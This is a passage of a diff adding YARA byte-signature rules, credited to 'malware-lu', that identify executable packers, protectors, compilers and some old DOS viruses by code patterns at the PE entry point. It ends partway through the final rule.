+rule Nakedbind10nakedcrew
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 8B 38 48 8B C8 F2 AF AF 8B 1F 66 33 DB 66 81 3B 4D 5A 74 08 81 EB 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV31LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiVirusVaccinev103
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA 33 DB B9 ?? ?? 0E 1F 33 F6 FC AD 35 ?? ?? 03 D8 E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxKuku448
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { AE 75 ED E2 F8 89 3E ?? ?? BA ?? ?? 0E 07 BF ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv12xNewStrain
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimpleUPXCryptorv3042005OnelayerencryptionMANtiCORE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote10Demo12SISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 09 01 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 DB 01 47 65 74 56 65 72 73 69 6F 6E 45 78 41 00 73 01 47 65 74 4D 6F 64 75 6C 65 46 69 6C 65 4E 61 6D 65 41 00 00 7A 03 57 61 69 74 46 6F 72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 00 BF 02 52 65 73 75 6D 65 54 68 72 65 61 64 00 00 29 03 53 65 74 54 68 72 65 61 64 43 6F 6E 74 65 78 74 00 00 94 03 57 72 69 74 65 50 72 6F 63 65 73 73 4D 65 6D 6F 72 79 00 00 6B 03 56 69 72 74 75 61 6C 41 6C 6C 6F 63 45 78 00 00 A6 02 52 65 61 64 50 72 6F 63 65 73 73 4D 65 6D 6F 72 79 00 CA 01 47 65 74 54 68 72 65 61 64 43 6F 6E 74 65 78 74 00 00 62 00 43 72 65 61 74 65 50 72 6F 63 65 73 73 41 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C }
+
+condition:
+		$a0
+}
+	
+	
+rule FSGv110EngbartxtWinRARSFX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 E9 A1 C1 C1 13 68 E4 16 75 46 C1 C1 05 5E EB 01 9D 68 64 86 37 46 EB 02 8C E0 5F F7 D0 }
+	$a1 = { EB 01 02 EB 02 CD 20 B8 80 ?? 42 00 EB 01 55 BE F4 00 00 00 13 DF 13 D8 0F B6 38 D1 F3 F7 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule BJFntv11b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 EA 9C EB 01 EA 53 EB 01 EA 51 EB 01 EA 52 EB 01 EA 56 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded26202623Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 BB AC 1E 00 00 2B C3 50 68 ?? ?? ?? ?? 68 B0 21 00 00 68 C4 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SLVc0deProtector11xSLVICU
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 C6 00 EB C6 40 01 08 FF E0 E9 4C ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RJoinerbyVaskaSignfrompinch250320071700
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 FD FF FF 6A 00 E8 0C 00 00 00 FF 25 6C 10 40 00 FF 25 70 10 40 00 FF 25 74 10 40 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AverCryptor10os1r1s
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 75 17 40 00 8B BD 9C 18 40 00 8B 8D A4 18 40 00 B8 BC 18 40 00 03 C5 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 A0 18 40 00 33 C0 51 33 C9 66 B9 FA 00 66 83 F9 00 74 49 8B 57 0C 03 95 A0 18 40 00 8B 85 A8 18 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 8B F1 E8 27 00 00 00 8B C8 5F B8 BC 18 40 00 03 C5 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 98 18 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 23 F7 8B C6 5F 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nSpackV23LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 70 61 63 6B 24 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule SENDebugProtector
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 29 ?? ?? 4E E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule xPEP03xxIkUg
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 53 56 51 52 57 E8 16 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote14SESISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 90 03 00 00 E8 C6 FD FF FF 68 90 03 00 00 E8 BC FD FF FF 68 90 03 00 00 E8 B2 FD FF FF 50 E8 AC FD FF FF 50 E8 A6 FD FF FF 68 69 D6 00 00 E8 9C FD FF FF 50 E8 96 FD FF FF 50 E8 90 FD FF FF 83 C4 20 E8 78 FF FF FF 84 C0 74 4F 68 04 01 00 00 68 10 22 60 00 6A 00 FF 15 08 10 60 00 68 90 03 00 00 E8 68 FD FF FF 68 69 D6 00 00 E8 5E FD FF FF 50 E8 58 FD FF FF 50 E8 52 FD FF FF E8 DD FE FF FF 50 68 A4 10 60 00 68 94 10 60 00 68 10 22 60 00 E8 58 FD FF FF 83 C4 20 33 C0 C2 10 00 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPack30NorthStar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ORiENV212FisunAV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 5D 01 00 00 CE D1 CE CD 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackv23NorthStar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }
+	$a1 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule ObsidiumV1342ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 C3 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SplashBitmapv100WithUnpackCodeBoBBobsoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 6A 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KBySV028shoooo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV12XObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 0E 00 00 00 33 C0 8B 54 24 0C 83 82 B8 00 00 00 0D C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackV13LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PENinja131Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidiumv1300ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }
+	$a1 = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B 50 EB 03 8A 0B 93 33 C0 EB 02 28 B9 8B 00 EB 01 04 C3 EB 04 65 B3 54 0A E9 FA 00 00 00 EB 01 A2 E8 D5 FF FF FF EB 02 2B 49 EB 03 7C 3E 76 58 EB 04 B8 94 92 56 EB 01 72 64 67 8F 06 00 00 EB 02 23 72 83 C4 04 EB 02 A9 CB E8 47 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Feokt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 89 25 A8 11 40 00 BF ?? ?? ?? 00 31 C0 B9 ?? ?? ?? 00 29 F9 FC F3 AA ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NTkrnlSecureSuite01015NTkrnlSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule PEPROTECT09
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 CF 00 00 00 0D 0A 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXERefactorV01random
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 90 0B 00 00 53 56 57 E9 58 8C 01 00 55 53 43 41 54 49 4F 4E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrunchPEv40
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 5D 81 ED 18 ?? ?? ?? 8B C5 55 60 9C 2B 85 E9 06 ?? ?? 89 85 E1 06 ?? ?? FF 74 24 2C E8 BB 01 00 00 0F 82 92 05 00 00 E8 F1 03 00 00 49 0F 88 86 05 00 00 68 6C D9 B2 96 33 C0 50 E8 24 }
+
+condition:
+		$a0
+}
+	
+	
+rule NullsoftPIMPInstallSystemv1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 5C 53 55 56 57 FF 15 ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pohernah100byKas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 58 60 E8 00 00 00 00 5D 81 ED 20 25 40 00 8B BD 86 25 40 00 8B 8D 8E 25 40 00 6B C0 05 83 F0 04 89 85 92 25 40 00 83 F9 00 74 2D 81 7F 1C AB 00 00 00 75 1E 8B 77 0C 03 B5 8A 25 40 00 31 C0 3B 47 10 74 0E 50 8B 85 92 25 40 00 30 06 58 40 46 EB ED 83 C7 28 49 EB CE 8B 85 82 25 40 00 89 44 24 1C 61 FF E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule dUP2diablo2oo2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 3C 01 75 19 BE ?? ?? ?? ?? 68 00 02 00 00 56 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01ASPack2xxHeuristicAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXpressorv145CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule hmimysProtectv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 BA 00 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 40 00 ?? ?? ?? 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 00 00 AD 8B DE 8B F0 83 C3 44 AD 85 C0 74 32 8B F8 56 FF 13 8B E8 AC 84 C0 75 FB AC 84 C0 74 EA 4E AD A9 }
+	$a1 = { E8 BA 00 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 40 00 ?? ?? ?? 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 00 00 AD 8B DE 8B F0 83 C3 44 AD 85 C0 74 32 8B F8 56 FF 13 8B E8 AC 84 C0 75 FB AC 84 C0 74 EA 4E AD A9 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule VProtectorV10Evcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0A 5B 56 50 72 6F 74 65 63 74 5D E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01LCCWin32DLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 83 7D 0C 01 75 05 E8 17 90 90 90 FF 75 10 FF 75 0C FF 75 08 A1 ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CodeCryptv014b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 C5 02 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC450DLLX86CRTLIB
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 85 DB 75 0D 83 3D ?? ?? ?? ?? 00 75 04 31 C0 EB 57 83 FB 01 74 05 83 FB 02 75 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EEXEVersion112
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 CD 21 3C 03 73 ?? BA 1F 00 0E 1F B4 09 CD 21 B8 FF 4C CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv120EngdulekxtMASM32TASM32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEDiminisherv01Teraphy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B D5 81 ED A2 30 40 00 2B 95 91 33 40 00 81 EA 0B 00 00 00 89 95 9A 33 40 00 80 BD 99 33 40 00 00 74 50 E8 02 01 00 00 8B FD 8D 9D 9A 33 40 00 8B 1B 8D 87 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02VBOX43MTEAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SEAAXE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC BC ?? ?? 0E 1F E8 ?? ?? 26 A1 ?? ?? 8B 1E ?? ?? 2B C3 8E C0 B1 ?? D3 E3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UpackV010V011Dwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? ?? AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 ?? F3 AB C1 E0 ?? B5 ?? F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C ?? 73 ?? B0 ?? 3C ?? 72 02 2C ?? 50 0F B6 5F FF C1 E3 ?? B3 ?? 8D 1C 5B 8D ?? ?? ?? ?? ?? ?? B0 ?? 67 E3 29 8B D7 2B 56 0C 8A 2A 33 D2 84 E9 0F 95 C6 52 FE C6 8A D0 8D 14 93 FF D5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakePCGuard403415FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 FC 55 50 E8 00 00 00 00 5D EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack111Method1bagieTMX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5B 8D 5B FA BD 00 00 ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 74 55 0F B7 47 22 09 C0 74 4D 6A 04 68 00 10 00 00 FF 77 10 6A 00 FF 93 38 03 00 00 50 56 57 89 EE 03 77 0C 8B 4F 10 89 C7 89 C8 C1 E9 02 FC }
+	$a1 = { 60 E8 00 00 00 00 5B 8D 5B FA BD 00 00 ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 74 55 0F B7 47 22 09 C0 74 4D 6A 04 68 00 10 00 00 FF 77 10 6A 00 FF 93 38 03 00 00 50 56 57 89 EE 03 77 0C 8B 4F 10 89 C7 89 C8 C1 E9 02 FC F3 A5 89 C1 83 E1 03 F3 A4 5F 5E 8B 04 24 89 EA 03 57 0C E8 3F 01 00 00 58 68 00 40 00 00 FF 77 10 50 FF 93 3C 03 00 00 83 C7 28 4E 75 9E BE ?? ?? ?? ?? 09 F6 0F 84 0C 01 00 00 01 EE 8B 4E 0C 09 C9 0F 84 FF 00 00 00 01 E9 89 CF 57 FF 93 30 03 00 00 09 C0 75 3D 6A 04 68 00 10 00 00 68 00 10 00 00 6A 00 FF 93 38 03 00 00 89 C6 8D 83 6F 02 00 00 57 50 56 FF 93 44 03 00 00 6A 10 6A 00 56 6A 00 FF 93 48 03 00 00 89 E5 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule MASM32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A ?? 68 00 30 40 00 68 ?? 30 40 00 6A 00 E8 07 00 00 00 6A 00 E8 06 00 00 00 FF 25 08 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftDefenderv10v11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD ?? 59 9C 50 74 0A 75 08 E8 59 C2 04 ?? 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 ?? ?? ?? ?? 58 05 BA 01 ?? ?? 03 C8 74 BE 75 BC E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XtremeProtectorv106
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 00 B9 75 ?? ?? 00 50 51 E8 05 00 00 00 E9 4A 01 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 8A 06 46 88 07 47 BB 02 00 00 00 02 D2 75 05 8A 16 46 12 D2 73 EA 02 D2 75 05 8A 16 46 12 D2 73 4F 33 C0 02 D2 75 05 8A 16 46 12 D2 0F 83 DF 00 00 00 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcasmProtector1112vcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidiumv1111
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 E7 1C 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEddie1530
+{
+      meta:
+		author="malware-lu"
+strings:
